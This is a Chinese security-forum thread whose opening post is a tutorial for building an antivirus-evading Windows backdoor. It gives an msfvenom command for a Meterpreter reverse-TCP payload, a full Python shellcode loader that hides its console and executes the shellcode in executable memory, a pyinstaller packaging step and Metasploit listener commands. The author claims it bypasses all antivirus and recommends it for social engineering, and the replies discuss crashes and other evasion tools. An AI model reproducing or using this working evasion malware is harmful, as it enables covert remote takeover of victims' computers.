用户
搜索
  • TA的每日心情
    开心
    2018-9-30 20:32
  • 签到天数: 45 天

    连续签到: 1 天

    [LV.5]常住居民I

    i春秋-见习白帽

    Rank: 3Rank: 3

    2

    主题

    78

    帖子

    1999

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2017-12-22
    发表于 2018-2-27 14:51:01 1420272
    声明:本教程只做技术研究请不要用于非法用途

         有没有小伙伴使用kali生成的payload木马被杀毒查杀的情况,可通过本教程的方法过目前一切杀毒软件,当然教程中的shellcode+python思路可用于任何木马的编辑,只要提取出shellcode就可以实现。

    首先
    1、在kali下生成一个反弹的msf的python脚本,命令如下:

    msfVENOM -p windows/x64/meterpreter/reverse_tcp LPORT=1234 LHOST=10.16.155.223  -e x86/shikata_ga_nai -i 17 -f py -o  /root/223-1234.py


    1.png
    2.png

    2、在kali本机root目录下将shellcode文件 223-1234.py 拷贝至自本机,安装pyshon 2.7 用于生成python脚本。

    3.png

    3、编辑pyshon脚本,使脚本可在windows中运行,在shellcode和首尾加如下代码:

    from ctypes import *
    
    import ctypes 
    
    buf =  ""
    buf += "\xda\xd6\xb8\x1e\x13\xc0\x94\xd9\x74\x24\xf4\x5f\x29"
    buf += "\xc9\xb1\xec\x31\x47\x19\x83\xc7\x04\x03\x47\x15\xfc"
    buf += "\xe6\x1b\x46\xbe\xf5\x36\xfc\x4a\xdc\x33\x27\x46\x87"
    buf += "\x92\xee\x17\xdd\xd4\x80\x4d\x1d\x67\x7b\xf2\xc9\x7b"
    buf += "\x99\xfd\x1e\xe1\x3a\x7e\x6c\xaa\x82\x3a\x94\x7b\xbc"
    buf += "\x58\x56\xd5\x4c\xd9\x9c\xda\xb3\x9b\x95\x39\xb3\x37"
    buf += "\x1f\xb0\xe3\x1c\x33\x99\x28\x3e\x55\xbf\xbc\x57\x2c"
    buf += "\x68\x91\x08\xc7\xb4\xb2\x6c\xfe\xe3\x51\xd9\x85\x29"
    buf += "\x3d\x81\xf4\xc2\x88\x42\xf1\xc1\xf8\x9a\x73\x01\x02"
    buf += "\x42\x59\x26\xf5\x6c\x35\x1f\x3a\x50\x71\xbd\x23\x9b"
    buf += "\xf0\xc7\xbc\x6c\x09\xa6\x5b\x54\x22\xee\x51\x34\x7d"
    buf += "\x7c\x5e\x2d\xce\xa4\x8f\xf9\x69\x17\x60\x62\x68\x05"
    buf += "\x3f\x41\x43\x90\x50\x9b\xd3\x0b\x94\x77\x3c\x84\x9f"
    buf += "\xeb\x0c\x42\x55\x6a\xb7\x32\x66\x92\x72\xce\x1c\x11"
    buf += "\xc0\x71\x4f\xe0\xf5\xa5\x73\x1b\x12\x4e\xe4\x5b\x3f"
    buf += "\x57\xb3\x12\x3f\x39\x1e\x50\x06\xdc\xae\xec\xa2\x10"
    buf += "\x01\x71\x54\xad\xa5\x49\xde\x79\x13\x25\x82\x14\xb4"
    buf += "\xa7\xb4\xdd\xad\x6c\x72\x00\x03\x99\xe3\xa3\x56\x90"
    buf += "\x44\x5f\xdf\x37\xc6\x8c\xf8\x5f\xba\x7d\x57\xd7\x43"
    buf += "\x86\x20\x55\x9e\x09\x9a\x69\x78\x19\x34\x61\x6d\xdf"
    buf += "\x0c\x02\x61\x14\xfd\x68\x04\x6e\xd4\x68\x27\x2a\xc4"
    buf += "\xea\x01\x8d\xed\x33\x67\x43\xa2\x1c\x48\x96\xbd\x90"
    buf += "\x64\x27\x6f\x0b\xda\xd3\x19\x15\x61\x38\x68\xfb\x5e"
    buf += "\xb7\xfd\x93\x82\x39\x87\xd9\x3c\xa1\xab\x2b\x99\x54"
    buf += "\x69\xc1\x75\xa5\x95\xcd\xf5\x2c\xe1\xdd\x92\x8b\x28"
    buf += "\xe2\xbf\x15\x23\x20\xfd\x2b\x57\x5c\x0c\x7c\x4f\x56"
    buf += "\x66\xa4\x71\xe8\x66\x2e\xf9\x4c\xd1\xcc\x22\x11\xd5"
    buf += "\x62\xfc\xf4\xde\x7c\x64\xbe\x3c\x12\xee\xd6\x7b\xcb"
    buf += "\x25\x24\xe8\x4f\x38\xf5\x2b\xd8\x73\x4b\x4a\x86\x36"
    buf += "\x2f\xf2\xae\xfc\x5c\x06\x05\xf8\x3c\x42\x61\xa1\x70"
    buf += "\x9a\xfc\xe9\x74\x02\x78\xac\x09\x2f\x3b\xf4\x24\x35"
    buf += "\x07\x4f\xe9\xe3\xfb\x02\xee\xcb\xdc\x23\x89\xef\x32"
    buf += "\x73\x97\x17\x54\x89\x3a\xcc\x81\x4a\x4c\xf5\xe8\x77"
    buf += "\xe1\x5c\x12\x7d\xeb\x38\x64\x98\xf9\xd4\x9b\x19\x2d"
    buf += "\xdf\x50\x4e\x3b\xce\x3c\x12\xf0\x6c\xc3\xd2\x33\xde"
    buf += "\x9c\x27\x94\x25\xad\xdd\x92\x48\x01\x6d\x39\xaa\x68"
    buf += "\x9d\x75\xae\xd3\x83\x20\x8a\x5a\x1b\x60\x5f\xc0\x7d"
    buf += "\x61\xed\xf2\x10\x69\xf1\x8a\xbd\x98\x1a\xd8\xd4\x1a"
    buf += "\x56\x42\x6d\x3f\xfe\xaf\xae\xfa\x9b\x10\x50\x91\x94"
    buf += "\x76\x0a\x48\xdb\xb1\xb5\x55\x5a\x6a\x9a\x19\xc4\x23"
    buf += "\xb2\x5c\x84\xe0\x46\x6f\xc0\x51\x1d\x4c\xf9\x56\x59"
    buf += "\x62\xf2\x9b\x3d\x4c\x65\xf0\x15\x82\x4e\xe2\x6f\x69"
    buf += "\xcb\x74\xa9\x71\xa2\xf8\x75\x84\x5a\x13\x62\x82\x7d"
    buf += "\xb8\xdf\x21\xb1\xcc\xd6\xc4\xa9\x53\x14\x45\x81\x08"
    buf += "\x5a\xb9\xc3\x14\xb9\xc3\x9d\x53\x94\xf9\x62\x5a\x44"
    buf += "\xa9\x55\x09\x5c\x53\x88\xe6\x09\x21\xfb\x42\x86\xca"
    buf += "\x5b\x85\x61\x0d\x64\x23\x64\xb1\x14\x08\x7f\x3f\x2e"
    buf += "\xce\xb0\x03\xf5\x70\x46\x36\xea\x64\xab\xf0\x20\x02"
    buf += "\xbc\xeb\x59\xee\xcf\xc4\x97\x79\x4c\xc0\x55\x36\x3a"
    buf += "\x06\x8f\xcc\x90\x08\x05\xbb\x1b\x0f\x7a\x06\x77\x06"
    buf += "\x53\x60\xeb\x7c\x4c\x2a\x0e\xc7\xd6\x92\x3a\x5a\x8f"
    buf += "\xa3\x61\xa5\x08\xfd\xa4\xe0\x78\x42\xb4\xad\xaa\x8a"
    buf += "\x3e\x66\x1f\xf8\xe7\xf5\xaf\x2e\xa9\x6b\xee\xe5\x54"
    buf += "\x10\x75\x89\xe0\xcc\x74\x7d\x9c\x59\xd7\x9e\x65\x13"
    buf += "\x07\x80\xe2\x49\x0a\x9b\xf4\xd9\x12\xef\x19\xf6\x3c"
    buf += "\x0f\x8f\x79\x9e\xe5\xb4\x14\x53\xb0\xb4\x17\x3b\x15"
    buf += "\x2d\x7d\xa6\x70\x13\x87\xc7\x61\x52\xb0\x48\x06\x90"
    buf += "\x72\xa9\x3b\xb2\x2d\x47\x8a\x12\x92\xc8\x86\xb8\xdd"
    buf += "\xa7\x70\x67\x03\x73\x0d\x26\x3f\x97\x64\x61\xac\xf2"
    buf += "\x04\x9e\x77\xfb\x34\xa5\x18\xe5\x62\x8d\xbf\x93\x36"
    buf += "\x9c\xd2\xa9\x2c\xd8\x14\x67\x47\xab\x4e\x83\x9e\xbf"
    buf += "\x23\x0c\x93\xc6\x49\x9f\xf9\x17\xa6\x8f\xd4\xcf\x3b"
    buf += "\x11\x62\xc3\xa2\x84\xa3\x84\x8b\x46\x02\x2a\x0f\x8d"
    buf += "\x03\x39\x2c\x89\xd7\x28\x5f\x96\x98\x26\x47\xbf\x86"
    buf += "\xed\xd3\x1a\x7c\x22\x14\x1b\xf3\xfa\xa3\x1f\x87\xa3"
    buf += "\xbc\x56\xb5\xb8\x83\xe5\x4c\xf3\x05\x4b\x4c\xc2\xe2"
    buf += "\xe0\x66\x39\xe7\x33\xce\x63\x70\x8b\x99\x86\xfc\xa3"
    buf += "\xb9\xdd\x1c\x9c\xd1\xc9\x58\xcb\x4b\xca\x6f\x84\xcd"
    buf += "\x20\xc0\x49\x89\xad\x98\xd9\x99\xe1\xa6\x0e\xf8\x70"
    buf += "\xc7\x5e\xb5\x21\x4a\xd2\x7a\x56\x0e\xea\xcd\xf3\x71"
    buf += "\x29\x37\xf3\xb8\xfc\xa2\x29\xc2\x2d\xf1\xb8\x63\x6c"
    buf += "\xab\xc8\xff\x92\x3e\xda\x86\x68\xda\x39\xa3\xdc\x83"
    buf += "\x6c\xb8\xf6\xc1\x1c\x29\x17\x87\x53\xac\xba\x95\xce"
    buf += "\xfc\xa1\x5d\x5d\xdb\xf7\xcc\x77\x49\xae\x2a\xda\xbf"
    buf += "\x36\xca\xec\x5a\x38\xf7\x97"
    
    #libc = CDLL('libc.so.6')
    
    PROT_READ = 1
    
    PROT_WRITE = 2
    
    PROT_EXEC = 4
    
    def executable_code(buffer):
    
        buf = c_char_p(buffer)
    
        size = len(buffer)
    
        addr = libc.valloc(size)
    
        addr = c_void_p(addr)
    
        if 0 == addr: 
    
            raise Exception("Failed to allocate memory")
    
        memmove(addr, buf, size)
    
        if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
    
            raise Exception("Failed to set protection on buffer")
    
        return addr
    
    VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
    
    VirtualProtect = ctypes.windll.kernel32.VirtualProtect
    
    shellcode = bytearray(buf)
    
    whnd = ctypes.windll.kernel32.GetConsoleWindow()   
    
    if whnd != 0:
    
           if 1==1:
    
                  ctypes.windll.user32.ShowWindow(whnd, 0)   
    
                  ctypes.windll.kernel32.CloseHandle(whnd)
    
    memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
    
                                              ctypes.c_int(len(shellcode)),
    
                                              ctypes.c_int(0x3000),
    
                                              ctypes.c_int(0x40))
    
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    
    old = ctypes.c_long(1)
    
    VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
    
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
    
                                         buf,
    
                                         ctypes.c_int(len(shellcode)))
    
    shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
    
    shell()


    下一步使用pyinstaller-2.0将做好的pyshon脚本生成exe程序。
    4.png
    D:\miansha\pyinstaller-2.0>python PyInstaller.py --console --onefile  223-1234.py

    生成后可在pyinstaller-2.0目录下找到223-1234文件夹,dist文件下就是我们生成的exe文件。
    5.png
    图标可以在生成前通过pyinstaller命令自定义图标,具体方法大家自行百度,教程至此免杀payload就已经制作完成。
    6.png
    当然在运行时也不会报毒,如果提示风险,此教程就没有任何意义了。

    4、在kali中开启msfconsole,设置反弹

    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 10.16.155.223
    set lport 1234
    run

    7.png
    开启监听。
    8.png





    8.png
    发表于 2018-2-27 18:58:40
    pyshon是新语言???还有你这文章是不是有点*大街了,代码都是COPY的??
    一位特爱收藏Supreme的大哥哥....
    使用道具 举报 回复
    发表于 2018-2-27 19:34:06
    阿甫哥哥 发表于 2018-2-27 18:58
    pyshon是新语言???还有你这文章是不是有点*大街了,代码都是COPY的??

    python.............
    使用道具 举报 回复
    发表于 2018-2-27 20:56:31
    又是一个标题党。
    print "Code By Luan"。
    原作者知道么
    使用道具 举报 回复
    发表于 2018-2-27 22:30:07
    生成的程序会停止运行
    不知道怎么破
    使用道具 举报 回复
    转载请注明出处
    使用道具 举报 回复
    发表于 2018-2-28 14:00:38

    QQ截图20180228140011.jpg
    一位特爱收藏Supreme的大哥哥....
    使用道具 举报 回复
    发表于 2018-2-28 15:18:22
    shellcode  4.7k  
    backdoor   1m多,
    虽逃过了杀软,却有些鸡肋,同理按照楼主的 思路 是不是我生成java的shellcode再打包成exe 貌似也能过杀软,,亦或者 用perl写shellcode再打包,qaq   意思到了就好  不喷  
    做自己的自己 和平年代的炮灰,战争年代的爆破鬼才
    使用道具 举报 回复
    发表于 2018-2-28 15:19:22

    哎呀 老哥别较真了,谁没有个敲错字的时候呢,哈哈
    做自己的自己 和平年代的炮灰,战争年代的爆破鬼才
    使用道具 举报 回复
    发表于 2018-2-28 15:20:26
    另外,,,你确定是“任何杀软”?表示质疑,,,,
    做自己的自己 和平年代的炮灰,战争年代的爆破鬼才
    使用道具 举报 回复
    发表于 2018-2-28 18:36:12
    转载请注明出处……
    求知若饥,虚心若愚。
    使用道具 举报 回复
    可用shellter或veil evasion进行加密免杀
    使用道具 举报 回复
    屌丝绅士 发表于 2018-2-28 15:20
    另外,,,你确定是“任何杀软”?表示质疑,,,,

    我测试过,目前的杀毒软件都可以过,哈勃分析我也试过。就是这样的方法生成的EXE文件体积有点大,py的解释文件是一起写到程序里的。
    使用道具 举报 回复
    屌丝绅士 发表于 2018-2-28 15:18
    shellcode  4.7k  
    backdoor   1m多,
    虽逃过了杀软,却有些鸡肋,同理按照楼主的 思路 是不是我生成java的 ...

    任何的病毒或者木马只要提取出shellcode就可以,功能是鸡肋,但用于社工还是很好的。唯一缺点就是生成的exe文件有点大。
    使用道具 举报 回复
    发表于 2018-3-2 20:15:28
    楼主 可以加一下你qq问一下相关问题吗。我pyinstaller生成以后软件打开崩溃,还反弹不到shell 求解 我的qq1739886878
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册